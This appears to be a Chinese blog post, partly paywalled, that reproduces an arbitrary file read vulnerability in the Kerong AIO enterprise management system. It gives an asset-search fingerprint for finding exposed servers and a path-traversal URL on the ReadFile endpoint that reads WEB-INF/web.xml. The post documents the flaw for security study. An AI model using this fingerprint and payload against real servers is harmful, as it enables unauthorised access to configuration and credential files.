【漏洞复现】科荣AIO ReadFile存在任意文件读取漏洞

最新推荐文章于 2024-05-20 12:33:13 发布
最新推荐文章于 2024-05-20 12:33:13 发布
阅读量32 收藏
点赞数
分类专栏: 网络安全 web安全 渗透测试 漏洞复现 文章标签: 渗透测试 漏洞复现 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010025272/article/details/137949350
版权

漏洞描述

科荣AIO—集成进销存,财务,OA,CRM,HR,电子商务一体化企业管理软件。该系统存在任意文件读取漏洞。
在这里插入图片描述

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

漏洞集合

【传送点】上千漏洞复现复现集合 exp poc 持续更新

资产确定

body="changeAccount('8000')"

漏洞复现

漏洞链接:http://127.0.0.1/ReadFile?tempFile=path&path=…/…/website/WEB-INF/&fileName=web.xml


                

                
                
        

        

    




        

            

                

                

                了解本专栏
                
                
                  
                订阅专栏 解锁全文
                 
                
                    
                    超级会员免费看
                
            

            
            
            
        

    

      

        

            

              
                
                  丢了少年失了心1
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
                
  • 
                  
                    打赏
                    
                  
                  
    打赏
    
                
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          

                

                        订阅专栏
                










                



	

		

			

				
					
漏洞复现】京师心智心理健康测评系统MyReport.ashx存在敏感信息泄露

				
			

			

				

					失心少年
				

				

					03-21
					
					179
					
				

			

		

		

			
				
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!漏洞链接:http://127.0.0.1/FunctionModular/PersonalReport/Ajax/MyReport.ashx?

			
		

	



                

              
                



	

		

			

				
					
畅捷通T+ KeyInfoList.aspx SQL注入漏洞(含批量验证poc)

				
			

			

				

					weixin_43567873的博客
				

				

					04-08
					
					274
					
				

			

		

		

			
				
畅捷通T+ KeyInfoList.aspx SQL注入漏洞(含批量验证poc)

			
		

	



                


  
              

                


	

		

			

				
					
LiveGBS user/save 逻辑缺陷漏洞复现(CNVD-2023-72138)

				
			

			

				

					nglj9527的博客
				

				

					05-20
					
					195
					
				

			

		

		

			
				
LiveGBS是一款国标(GB28181)流媒体服务软件,可提供提供用户管理及Web可视化页面管理,开源的前端页面源码;提供设备状态管理,可实时查看设备是否掉线等信息等。安徽青柿信息科技有限公司LiveGBS存在逻辑缺陷漏洞,攻击者可利用该漏洞任意添加用户。

			
		

	





	

		

			

				
					
畅捷通T+任意文件上传(CNVD-2022-60632 )漏洞复现

				
			

			

				

					qq_50854662的博客
				

				

					11-09
					
					4436
					
				

			

		

		

			
				
畅捷通T+任意文件上传(CNVD-2022-60632 )漏洞复现

			
		

	



		

			
		



	

		

			

				
					
智能=安全?10款智能家居竟有250种漏洞

				
			

			

				

					weixin_33958585的博客
				

				

					08-16
					
					258
					
				

			

		

		

			
				
据科技博客Re/code报道,惠普的Fortify应用程序安全部门对市面上最热门的10款消费级智能家居产品进行了研究分析,共发现250种安全漏洞。注意是“种”不是“个”,每款产品的漏洞个数显然会更多。

或许是迫于压力,惠普并没有公布被调查的产品品牌,而只说了它们的种类:它们来自“电视、网络摄像头、家用恒温器、远程电源插座、洒水车控制器、多设备控制中枢...

			
		

	





	

		

			

				
					
科荣AIO管理系统V7版-用户手册

				
			

			

				

					06-24
				

			

		

		

			
				
科荣AIO管理系统V7版-用户手册 科荣aio从零开始学习 辅助文档

			
		

	





	

		

			

				
					
免费ERP 科荣一体化管理软件AIO-II v7.0.2924

				
			

			

				

					10-15
				

			

		

		

			
				
科荣AIO企业一体化管理解决方案,通过ERP(进销存财务)、OA(办公自动化)、CRM(客户关系管理)、UDP(自定义平台),集电子商务平台、支付平台、ERP平台、微信平台、移动APP等解决

			
		

	





	

		

			

				
					
科荣OA基础操作手册(实例篇).docx

				
			

			

				

					05-26
				

			

		

		

			
				
科荣OA基础操作手册(实例篇

			
		

	





	

		

			

				
					
科荣线路板公司岗位职责说明书doc59页.doc

				
			

			

				

					10-07
				

			

		

		

			
				
科荣线路板公司岗位职责说明书doc59页.doc

			
		

	





	

		

			

				
					
注意!多款智能家居Hub存在远程代码执行漏洞

				
			

			

				

					systemino的博客
				

				

					09-02
					
					469
					
				

			

		

		

			
				
近日,有研究团队在三个不同的家庭集线器– Fibaro Home Center Lite,Homematic中央控制单元(CCU2)和eLAN-RF-003中发现了许多严重的安全漏洞。这些设备用于监视和控制欧洲及其他地区数以千计的家庭和公司中的智能家居。这些漏洞的潜在后果包括完全访问这些受监视系统中的中央和外围设备以及它们包含的敏感数据,未经身份验证的远程代码执行以及中间人(MitM)攻击。这些集线器主要用于家庭和小型办公室环境,但它们也为企业打开了潜在的攻击载体。如今,随着越来越多的员工在家工作,这一趋势

			
		

	





	

		

			

				
					
漏洞复现】畅捷通T+ InitServerInfo.aspx SQL注入漏洞

				
			

			

				

					weixin_52204925的博客
				

				

					03-13
					
					817
					
				

			

		

		

			
				
畅捷通T+InitServerInfo.aspx接口处存在SQL注入漏洞 ,恶意攻击者可能会利用该漏洞获取服务器敏感信息,最终可能导致服务器失陷。

			
		

	





	

		

			

				
					
AI技术在智能家居安全系统中的应用:漏洞和风险分析

				
			

			

				

					禅与计算机程序设计艺术
				

				

					07-01
					
					4296
					
				

			

		

		

			
				
作者:禅与计算机程序设计艺术                    
AI技术在智能家居安全系统中的应用:漏洞和风险分析

引言


智能家居安全系统是人工智能技术在家庭安全领域的重要应用之一。通过智能化手段,如语音识别、图像识别、自然语言处理、机器学习等

			
		

	





	

		

			

				
					
用友畅捷通CRM存在默认空口令漏洞

				
			

			

				

					nnn2188185的博客
				

				

					04-23
					
					425
					
				

			

		

		

			
				
用友畅捷通CRM存在默认空口令漏洞,攻击者可以利用默认口令登录网站后台,以后台权限进行敏感操作,构成信息泄露风险。

			
		

	





	

		

			

				
					
【未公开】LiveGBS-信息泄漏-list

				
			

			

				

					知黑而守白
				

				

					05-08
					
					359
					
				

			

		

		

			
				
LiveGBS是一款支持国标GB28181的流媒体服务,可实现无插件的视频监控和直播,适用于安防、电网等行业。其可提供可视化 WEB 页面管理,开源的前端源码;也支持树型展示,及自定义虚拟目录;支持语音对讲,级联语音对讲;支持云台控制、预置位巡航;

			
		

	





	

		

			

				
					
漏洞复现】OpenMetadata 命令执行漏洞复现(CVE-2024-28255)

				
			

			

				

					KKleeeaa的博客
				

				

					04-11
					
					345
					
				

			

		

		

			
				
声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。然后就是反弹shell,nc连。0x01FOFA测绘。

			
		

	





	

		

			

				
					
安徽青柿信息科技有限公司LiveGBS默认用户名口令漏洞复现

					
最新发布

				
			

			

				

					nglj9527的博客
				

				

					05-20
					
					164
					
				

			

		

		

			
				
(附Nuclei模板)LiveGBS是一款国标(GB28181)流媒体服务软件,可提供提供用户管理及Web可视化页面管理,开源的前端页面源码;提供设备状态管理,可实时查看设备是否掉线等信息等。安徽青柿信息科技有限公司LiveGBS存在弱口令漏洞,admin/admin。

			
		

	





	

		

			

				
					
漏洞复现】用友畅捷通TPlus InitServerInfo.aspx SQL注入漏洞

				
			

			

				

					https://blog.echo234.cn/
				

				

					03-25
					
					412
					
				

			

		

		

			
				
畅捷通T+专属云适用于需要一体化管理的企业,财务管理、业务管理、零售管理、生产管理、物流管理、移动仓管、营销管理、委外加工等人财货客一体化管理。该系统在InitServerInfo.aspx接口处未对用户的输入进行过滤和校验存在SQL注入漏洞

			
		

	





	

		

			

				
					
脸爱云 一脸通智慧管理平台任意用户添加漏洞

				
			

			

				

					m0_64366018的博客
				

				

					01-22
					
					330
					
				

			

		

		

			
				
登录后可以看见其他人的账户密码。

			
		

	





	

		

			

				
					
漏洞复现】Telesquare admin.cgi 远程代码执行漏洞(CVE-2024-29269)

				
			

			

				

					qq_67810151的博客
				

				

					04-07
					
					448
					
				

			

		

		

			
				
Telesquare TLR-2005Ksh版本1.0.0和1.1.4存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经cmd参数授权的情况下执行系统命令,并获取服务器权限。

			
		

	





	

		

			

				
					
科荣aio管理系统v7版-用户手册

				
			

			

				

					12-02
				

			

		

		

			
				
科荣AIO管理系统V7版是一款全新升级的管理系统,旨在为用户提供更加便捷高效的操作体验。本用户手册将详细介绍系统的功能及操作方法,帮助用户快速上手使用。

系统功能方面,科荣AIO管理系统V7版提供了多种功能模块,包括人力资源管理、财务管理、销售管理、库存管理等。用户可以根据自身需求选择相应的模块进行操作。例如,人力资源管理模块提供了员工信息管理、考勤管理、工资管理等功能,用户可以通过该模块实现对人力资源的全面管理。

在操作方法方面,用户可以通过登录系统后,选择对应的模块进入相应页面。系统界面简洁清晰,用户可以通过菜单栏或快捷入口快速找到所需功能。在每个页面中,用户可以根据提示输入相应的信息,例如添加或修改员工信息、录入财务数据等。系统还提供了数据查询和报表生成等功能,用户可以方便地查看和分析数据。

此外,科荣AIO管理系统V7版还具有用户权限管理功能,管理员可以根据需要设置不同用户的权限,确保系统的安全性和数据的保密性。

总之,科荣AIO管理系统V7版是一款功能强大、操作简便的管理系统,通过本用户手册的详细介绍,用户可以迅速掌握系统的使用方法,提高工作效率。如果用户在使用过程中遇到问题,可以参考本手册或联系系统供应商的客服人员寻求帮助。

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
丢了少年失了心1

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值